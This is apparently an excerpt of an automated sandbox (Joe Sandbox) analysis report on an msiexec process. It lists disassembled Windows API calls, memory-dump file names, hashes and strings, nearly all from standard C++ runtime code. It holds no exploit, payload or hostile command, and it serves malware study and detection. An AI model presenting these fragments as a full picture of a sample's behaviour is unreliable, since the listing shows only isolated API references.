                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                                                • API String ID: 1840309910-1405518554
                                                                                                                                                                                                                                • Opcode ID: 7e43e4c5cf5453de229c544a4a298de13f3f7a8457e00edb47320af5e39ad40e
                                                                                                                                                                                                                                • Instruction ID: 9cbdb40e3cb7d2a500daea9215ee47115295e75893ae794dde9e27a205988fc0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e43e4c5cf5453de229c544a4a298de13f3f7a8457e00edb47320af5e39ad40e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9517FB1D00348AFDB91EFA4DD45B9EBBB8AF54700F144129EC15A7280E735AA09CFA1
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,06194485,061819F7,?,00000000,?,?,?,06194652,00000022,FlsSetValue,061A43A4,ccs,?), ref: 06194437
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06182620: ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: __EH_prolog3.LIBCMT ref: 061875F5
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::_Lockit::_Lockit.LIBCPMT ref: 06187600
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::locale::_Setgloballocale.LIBCPMT ref: 0618761B
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: _Yarn.LIBCPMT ref: 06187631
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::_Lockit::~_Lockit.LIBCPMT ref: 0618766E
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0618631F
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06186343
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186364
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 061863D6
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 061863F2
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 06186458
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3RegisterSetgloballocaleYarn___std_exception_copystd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2413194342-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 061866D6
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 061866F9
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186719
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0618678B
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 061867A3
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 061867C6
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0618B561,0618952E,06188D82), ref: 0618B578
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0618B586
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0618B59F
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0618B561,0618952E,06188D82), ref: 0618B5F1
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06186C52
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 06186C9E
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 06186CBD
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186D52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                                                • API String ID: 1143662833-1405518554
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E8B440B6,?,?,00000000,0619FD10,000000FF,?,0618F8C3,?,?,0618F897,00000016), ref: 0618F91C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0618F92E
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,0619FD10,000000FF,?,0618F8C3,?,?,0618F897,00000016), ref: 0618F950
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
• Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06196DEA
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06196EB3
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F1A
                                                                                                                                                                                                                                  • Part of subcall function 06195D59: HeapAlloc.KERNEL32(00000000,?,?,?,06189307,?,?,?,E8B440B6,?,061819F7,?,?,?), ref: 06195D8B
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F2D
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F3A
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 061875F5
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06187600
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0618766E
                                                                                                                                                                                                                                  • Part of subcall function 06187751: std::locale::_Locimp::_Locimp.LIBCPMT ref: 06187769
                                                                                                                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 0618761B
                                                                                                                                                                                                                                • _Yarn.LIBCPMT ref: 06187631
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 06189540: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,E8B440B6,?,?,0618743C,?,061A9F00,?), ref: 061895A0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0618C663,00000000,?,E8B440B6,?,?,?,0618C78D,00000002,FlsGetValue,061A2BD0,FlsGetValue), ref: 0618C6BF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0618C663,00000000,?,E8B440B6,?,?,?,0618C78D,00000002,FlsGetValue,061A2BD0,FlsGetValue,00000000,?,0618B61D), ref: 0618C6C9
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,0618B61D,?,?,?,?,?,?), ref: 0618C6F1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(E8B440B6,00000000,00000000,00000000), ref: 0619311E
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 06193370
                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 061933B6
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 06193459
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 06198380
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 06198387
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 061983C1
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 061983C8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 061992C5
                                                                                                                                                                                                                                  • Part of subcall function 0619805B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,06196F10,?,00000000,-00000008), ref: 061980BC
                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 061992FD
                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0619931D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000), ref: 0619DD94
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000,00000000,?,06193A87,?), ref: 0619DDA0
                                                                                                                                                                                                                                  • Part of subcall function 0619DD66: CloseHandle.KERNEL32(FFFFFFFE,0619DDB0,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000,00000000), ref: 0619DD76
                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 0619DDB0
                                                                                                                                                                                                                                  • Part of subcall function 0619DD28: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0619DD57,0619C2A3,00000000,?,061934AD,00000000,00000000,00000000,00000000), ref: 0619DD3B
                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0619C2B6,00000000,00000001,0000000C,00000000,?,061934AD,00000000,00000000,00000000,00000000), ref: 0619DDC5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 06189540: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,E8B440B6,?,?,0618743C,?,061A9F00,?), ref: 061895A0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                                                                                                                                                • API String ID: 3109751735-1240500531
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0618B3AF
                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0618B463
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 0618BCA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 002EDD93
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 002EDE2D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectorySystem
                                                                                                                                                                                                                                • String ID: C6
                                                                                                                                                                                                                                • API String ID: 2188284642-129923243
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 06181B65
                                                                                                                                                                                                                                  • Part of subcall function 0618741D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 06187429
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 06181B8E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: string too long
